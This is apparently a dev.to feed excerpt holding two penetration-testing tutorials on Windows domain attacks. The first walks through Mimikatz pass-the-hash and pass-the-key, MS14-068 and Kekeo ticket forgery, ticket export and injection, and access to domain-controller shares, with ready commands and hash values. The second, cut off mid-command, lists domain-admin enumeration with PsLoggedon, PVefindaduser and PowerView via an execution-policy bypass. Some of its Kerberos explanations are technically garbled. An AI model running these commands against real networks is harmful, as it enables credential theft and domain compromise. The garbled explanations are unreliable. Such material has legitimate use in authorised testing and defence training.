&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9od7m10riqpp0uk2t7xk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9od7m10riqpp0uk2t7xk.png" alt=" " width="800" height="589"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fled1zd7l7dn4zfxa6reu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fled1zd7l7dn4zfxa6reu.png" alt=" " width="720" height="359"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Kerberos Protocol Workflow
&lt;/h3&gt;

&lt;p&gt;The Kerberos protocol operates within a domain context according to the following simplified procedure:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The client machine computes an NTLM hash of the user's plaintext password and encrypts it with a timestamp, utilising the krbtgt password hash as the key. This ciphertext is transmitted to the Key Distribution Centre (KDC), or domain controller. The KDC authenticates the user and subsequently generates a Ticket-Granting Ticket (TGT). The TGT's cryptographic signature is returned to the client; within the Kerberos framework, the TGT data can only be deciphered by the domain user krbtgt.&lt;/li&gt;
&lt;li&gt;Subsequently, the client presents the TGT to the KDC to request a Ticket-Granting Service (TGS) ticket. The KDC validates the submitted TGT. Upon successful verification, it encrypts the target service account's NTLM hash and the TGT, returning the resultant ciphertext to the client.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The following definitions distinguish the three credential transfer techniques:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PTH (Pass the Hash):&lt;/strong&gt; A penetration testing method conducted using the value of the &lt;strong&gt;LM or NTLM hash&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTT (Pass the Ticket):&lt;/strong&gt; A penetration test performed by utilising the &lt;strong&gt;TGT credentials&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTK (Pass the Key):&lt;/strong&gt; A penetration test executed using the &lt;strong&gt;ekeys AES256 hash&lt;/strong&gt; (this key material can be obtained via the &lt;code&gt;sekurlsa::ekeys&lt;/code&gt; command within Mimikatz).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;On Authentication Hashes:&lt;/strong&gt;&lt;br&gt;
Windows operating systems utilise two primary hashing algorithms: LM Hash and NTLM Hash. For personal systems running Windows Vista or later, and server systems from Windows Server 2003 onwards, the standard authentication method is exclusively NTLM Hash.&lt;/p&gt;

&lt;p&gt;A ticket may be conceptualised as analogous to a cookie deposited upon login to a website, or a persistent credential established between a computer and a remote entity. This ticket can subsequently be reused to re-establish a connection, functioning precisely like a session cookie. While PTH and PTK utilise identical connection protocols, PTT operates distinctly via the Kerberos protocol.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PTH Mechanism:&lt;/strong&gt;&lt;br&gt;
PTH constitutes a classic attack vector in intranet penetration. Its operational principle permits an attacker to remotely access a host or service by leveraging the LM Hash and NTLM Hash values, without necessitating the corresponding plaintext password. &lt;em&gt;In essence, it suffices to acquire the encrypted hash value to mount an attack; the plaintext password is not required.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The attack landscape is nuanced. If NTLM authentication is disabled, the tool PsExec cannot establish a remote connection using the obtained NTLM hash; however, Mimikatz can still facilitate a successful attack. On Windows 8.1/2012 R2, and on Windows 7/2008 R2/8/2012 once patch KB2871997 is installed, &lt;strong&gt;AES keys may substitute for the NT hash to execute a PTK attack.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Summary: Impact of the KB2871997 Patch (whether the patch is installed can be verified with &lt;code&gt;systeminfo&lt;/code&gt;)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PTH:&lt;/strong&gt; On unpatched systems, any user can connect. Post-patch, only connections as the built-in Administrator account are permitted.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTK:&lt;/strong&gt; The patch enables connections using the AES256 key for any user.&lt;/li&gt;
&lt;li&gt;Refer to: &lt;em&gt;Does KB2871997 truly defend against PTH attacks? - FreeBuf Cybersecurity Industry Portal&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Nature of PTT Attacks:&lt;/strong&gt;&lt;br&gt;
The PTT attack modality diverges from simple NTLM authentication: it is an attack leveraging the Kerberos protocol. Three prevalent attack methodologies are introduced here: the MS14-068 exploit, Golden Ticket, and Silver Ticket. Succinctly, these methods function by injecting into system memory a forged ticket that the target nevertheless accepts as valid, in order to achieve a connection.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MS14-068 Vulnerability:&lt;/strong&gt; An elevation of privilege vulnerability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket &amp;amp; Silver Ticket:&lt;/strong&gt; These are categorised as &lt;strong&gt;persistence and privilege maintenance techniques&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The MS14-068 vulnerability is hazardous because it enables any ordinary domain user to elevate their privileges to domain administrator. Microsoft's corrective patch is KB3011780.&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Technique Summaries
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTH Transfer - Mimikatz&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTK Transfer - Mimikatz&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domain Lateral Movement via PTT Transfer - MS14-068 &amp;amp; Kekeo &amp;amp; Local Tickets&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Domestic Ladon Intranet Penetration Framework Testing - Information Gathering, Connectivity, etc.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl6g8rkt1usdkgm8f2r34.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fl6g8rkt1usdkgm8f2r34.png" alt=" " width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h2&gt;
  
  
  Case Study 1: Domain Lateral Movement via PTH Transfer - Mimikatz
&lt;/h2&gt;

&lt;p&gt;This method, Pass the Hash, operates by discovering the password hash value (typically the NTLM hash) associated with an account. In a domain environment, where most computers are logged onto by domain users, a significant number of machines share an identical local administrator password set during installation. Consequently, if the local administrator credentials are uniform, an attacker can utilise a hash passing technique to log into other machines across the intranet. The critical advantage for the attacker is circumventing the computationally expensive and time-consuming process of cracking the password hash to reveal the plaintext.&lt;/p&gt;

&lt;p&gt;Mimikatz serves as the instrumental tool for PTH, functioning not only as a credential harvester and plaintext password extractor but also as an attack platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PTH NTLM Transfer Commands:&lt;/strong&gt;&lt;br&gt;
For unpatched workgroup and domain connections:&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7&lt;/code&gt; (Assuming knowledge of the domain controller hash)&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad458a5695dc997aa02d455c&lt;/code&gt; (workgroup designates a local user connection)&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad217334fe7&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Target example: \\OWA2010CN-God.god.org (Domain Controller)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Experimental Demonstration:&lt;/strong&gt;&lt;br&gt;
Execute the following sequence within an elevated PowerShell console on a 2008R2 x64 web server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Command sequence:
privilege::debug
sekurlsa::logonPasswords (to extract plaintext passwords)
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 (Mimikatz will spawn a new command prompt window upon execution)
In the newly spawned window, execute: dir \\192.168.3.21\c$ (if the IP address is not resolvable, substitute the target's hostname)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Case Study 2: Domain Lateral Movement via PTK Transfer - Mimikatz
&lt;/h2&gt;

&lt;p&gt;This method passes the account's AES256 Kerberos key rather than its NTLM hash.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Commands for Patched Workgroup and Domain Connections:&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;sekurlsa::ekeys&lt;/code&gt; # retrieves the AES key material&lt;br&gt;
&lt;code&gt;sekurlsa::pth /user:mary /domain:god /aes256:d7c110753a2f7f240e5b2701dc1d16a16e40af3c5cdf814781c4b&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Crucially, for a PTK attack to succeed for a non-administrator user, the target system must have the KB2871997 patch installed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh4cg4keu31xahutfyphl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh4cg4keu31xahutfyphl.png" alt=" " width="800" height="348"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Case Study 3: Domain Lateral Movement via PTT Transfer - MS14-068 &amp;amp; Kekeo &amp;amp; Local Tickets
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;First Method: Exploiting the MS14-068 Vulnerability&lt;/strong&gt;&lt;br&gt;
This technique enables an ordinary domain user to directly obtain system-level privileges on the domain controller.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Procedure for MS14-068 via PowerShell:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Ascertain the current Security Identifier (SID):&lt;/strong&gt; &lt;code&gt;whoami /user&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Credential Management:&lt;/strong&gt;
&lt;code&gt;mimikatz # kerberos::purge&lt;/code&gt; // Purges all Kerberos tickets cached on the current machine, as lingering tickets from the existing domain session can interfere with ticket forgery.
&lt;code&gt;mimikatz # kerberos::list&lt;/code&gt; // Lists the Kerberos tickets currently cached on the machine.
&lt;code&gt;mimikatz # kerberos::ptc &amp;lt;ticket_filename&amp;gt;&lt;/code&gt; // Inject a generated ticket into memory.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Generate TGT Data via MS14-068:&lt;/strong&gt;
&lt;code&gt;ms14-068.exe -u &amp;lt;DomainMember&amp;gt;@&amp;lt;domain&amp;gt; -s &amp;lt;sid&amp;gt; -d &amp;lt;domain_controller_address&amp;gt; -p &amp;lt;domain_member_password&amp;gt;&lt;/code&gt;
&lt;em&gt;Example:&lt;/em&gt; &lt;code&gt;MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-21573346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Inject the Forged Ticket into Memory:&lt;/strong&gt;
&lt;code&gt;mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Verify Credential Cache:&lt;/strong&gt; &lt;code&gt;klist&lt;/code&gt; (Displays the currently cached Kerberos tickets; use &lt;code&gt;klist purge&lt;/code&gt; to delete them).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Leverage the Access:&lt;/strong&gt;
&lt;code&gt;dir \\192.168.3.21\c$&lt;/code&gt; (or &lt;code&gt;net use&lt;/code&gt; for connection; if IP fails, use the hostname).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The principle of this ticket passing attack lies in generating a well-formed ticket that the target accepts as valid and importing it into memory via Mimikatz, thereby obviating the need for a password during the connection phase.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Second Method: Utilising the Kekeo Tool&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Generate the Ticket:&lt;/strong&gt;
&lt;code&gt;kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a5dc997aa02d45c"&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Import the Ticket:&lt;/strong&gt;
&lt;code&gt;kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Verify Credential Cache:&lt;/strong&gt; &lt;code&gt;klist&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Establish Connection:&lt;/strong&gt;
&lt;code&gt;dir \\192.168.3.21\c$&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Third Method: Exploiting Local Tickets (Requires Local Administrator Privileges)&lt;/strong&gt;&lt;br&gt;
This method essentially involves the harvesting and reuse of valid, pre-existing Kerberos tickets, loosely analogous to reusing session cookies. The initial step is to use Mimikatz to export the locally cached tickets and subsequently import them into memory.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Command Sequence:&lt;/strong&gt;
&lt;code&gt;sekurlsa::tickets /export&lt;/code&gt;
&lt;code&gt;kerberos::ptt xxxxxxxxx.xxx.kirbi&lt;/code&gt; (This imports the previously exported ticket and tests whether it is still accepted; an exported ticket remains usable only within its 10-hour validity window).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; PTT delivery does not in general mandate local administrator privileges; the local-ticket method above is the exception, since exporting cached tickets requires them. Connections should be established using the hostname. The technique is predicated upon known vulnerabilities, dedicated tools, or the harvesting of locally cached tickets.&lt;/p&gt;




&lt;h2&gt;
  
  
  Case Study 4: The Ladon Intranet Penetration Framework - Testing and Validation
&lt;/h2&gt;

&lt;p&gt;This section covers the practical application of Ladon for Information Gathering, Protocol Scanning, Vulnerability Probing, and Credential Passing Attacks.&lt;/p&gt;

&lt;p&gt;Ladon functions as a large-scale intranet penetration scanner, often used in conjunction with Cobalt Strike. Ladon version 8.9 incorporates 120 built-in modules for tasks including information gathering, live host detection, port scanning, service identification, password spraying, vulnerability detection, and vulnerability exploitation. Vulnerability detection encompasses MS17-010 (EternalBlue), SMBGhost, WebLogic, ActiveMQ, Tomcat, and Struts2. Password spraying targets databases (MySQL, Oracle, MSSQL), remote access protocols (FTP, SSH for Linux, VNC), and Windows services (IPC, WMI, SMB, NetBIOS, LDAP, SmbHash, WmiHash, WinRM). Remote command execution supports multiple methods (smbexec, wmiexec, psexec, atexec, sshtexec) and exploitation frameworks (e.g., sshell, Webshell). Version X-4.0 and subsequent iterations are discussed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Resources:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Ladon Repository: &lt;code&gt;https://github.com/k8gege/Ladon&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Kekeo Releases: &lt;code&gt;https://github.com/gentilkiwi/kekeo/releases&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;MS14-068 Exploit: &lt;code&gt;https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>domain</category>
      <category>cybersecurity</category>
      <category>offensive</category>
      <category>credential</category>
    </item>
    <item>
      <title>Rapid Identification of Domain Administrators and Domain Controllers in Internal Network Penetration Testing</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 09:13:56 +0000</pubDate>
      <link>https://dev.to/excalibra/rapid-identification-of-domain-administrators-and-domain-controllers-in-internal-network-24k5</link>
      <guid>https://dev.to/excalibra/rapid-identification-of-domain-administrators-and-domain-controllers-in-internal-network-24k5</guid>
      <description>&lt;p&gt;In the process of internal network penetration testing, the ability to rapidly identify Domain Administrators and Domain Controllers is of paramount importance. Several commonly employed methods are introduced below.&lt;/p&gt;

&lt;h2&gt;
  
  
  Locating Domain Administrators
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Command Line Identification
&lt;/h3&gt;

&lt;p&gt;The following command can be executed in the command prompt to query domain administrator accounts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net group "Domain Admins" /domain            //Query Domain Administrators
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6ckha3bhx0fbbrvdddhq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6ckha3bhx0fbbrvdddhq.png" alt="Figure 1: Output of the net group command listing Domain Administrators." width="800" height="310"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 1: Output of the net group command listing Domain Administrators.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Tool-Based Identification
&lt;/h3&gt;

&lt;p&gt;Several specialised tools can facilitate the enumeration of Domain Administrator accounts and their logged-on locations.&lt;/p&gt;

&lt;h4&gt;
  
  
  PSLoggedon.exe
&lt;/h4&gt;

&lt;p&gt;This utility identifies users logged on to a system by examining the registry key &lt;code&gt;HKEY_USERS&lt;/code&gt; and utilising the &lt;code&gt;NetSessionEnum&lt;/code&gt; API. Note that certain functionalities of this tool require elevated, administrator-level privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon&lt;/code&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays supported options and units of measurement for output values.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-l&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Shows only local logons instead of both local and network resource logons.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-x&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Does not display logon times.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;\\computername&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specifies the name of the computer for which logon information is to be listed.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;username&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specifies a user name to search for across the network for machines where that user is logged on.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;To locate a specific user, such as 'Administrator', the tool is invoked as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PsLoggedon.exe Administrator
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzmbputd5riz7z41aflxz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzmbputd5riz7z41aflxz.png" alt="Figure 2: Enumeration results showing machines where the Administrator user has logged on." width="799" height="215"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 2: Enumeration results showing machines where the Administrator user has logged on.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;To query a specific machine, the command is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PsLoggedon.exe \AD-server
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7mze0gyv435ymj0yu295.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7mze0gyv435ymj0yu295.png" alt="Figure 3: Output displaying users currently logged on to the machine AD-server." width="571" height="208"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 3: Output displaying users currently logged on to the machine AD-server.
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  PVefindaduser.exe
&lt;/h4&gt;

&lt;p&gt;This tool is designed to ascertain the logon locations of Active Directory users, enumerate domain users, and identify users logged on to specific computers, including local users, those connected via RDP, and accounts used to run services and scheduled tasks. This tool also requires administrator privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn&lt;/code&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-h&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays help information.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-u&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Checks if a newer version of the programme is available.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-current ["username"]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays the user currently logged on to each PC within the domain. If a username is specified in quotation marks, it only displays PCs where that particular user is logged on.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-noping&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevents the tool from pinging target computers before attempting to enumerate user logons.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-target&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;An optional parameter for specifying a comma-separated list of hostnames to query. If omitted, all hosts in the current domain are queried. Results are output to a &lt;code&gt;report.csv&lt;/code&gt; file.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Executing the command &lt;code&gt;pvefindaduser.exe -current&lt;/code&gt; will display all users currently logged on to all machines within the domain.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4bproa3o2ngqgr53dd8h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4bproa3o2ngqgr53dd8h.png" alt="Figure 4: Console output of PVefindaduser.exe showing current logon sessions across the domain" width="800" height="465"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 4: Console output of PVefindaduser.exe showing current logon sessions across the domain
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;This operation writes a &lt;code&gt;report.csv&lt;/code&gt; file on the host where the tool was executed, which can be retrieved for subsequent analysis.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fp0cfxnepw7w50qumm86j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fp0cfxnepw7w50qumm86j.png" alt="Figure 5: The contents of the generated report.csv file, detailing user logon locations." width="800" height="45"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 5: The contents of the generated report.csv file, detailing user logon locations.
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  PowerView.ps1
&lt;/h4&gt;

&lt;p&gt;This PowerShell script is a component of the PowerSploit toolkit and serves as a robust instrument for gathering domain information. A suite of cmdlets is provided, including &lt;code&gt;Get-NetUser&lt;/code&gt;, &lt;code&gt;Get-NetDomainController&lt;/code&gt;, and &lt;code&gt;Invoke-UserHunter&lt;/code&gt;, which specifically aids in identifying the computers to which domain users are logged on and whether they possess local administrator privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;To locate Domain Administrators using PowerView, one may bypass the execution policy and invoke the script as demonstrated below:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;powershell.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-exec&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bypass&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"&amp;amp; {Import-Module C:\Users\win7\Desktop\tool\PowerView.ps1; Invoke-UserEvenHunter}"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



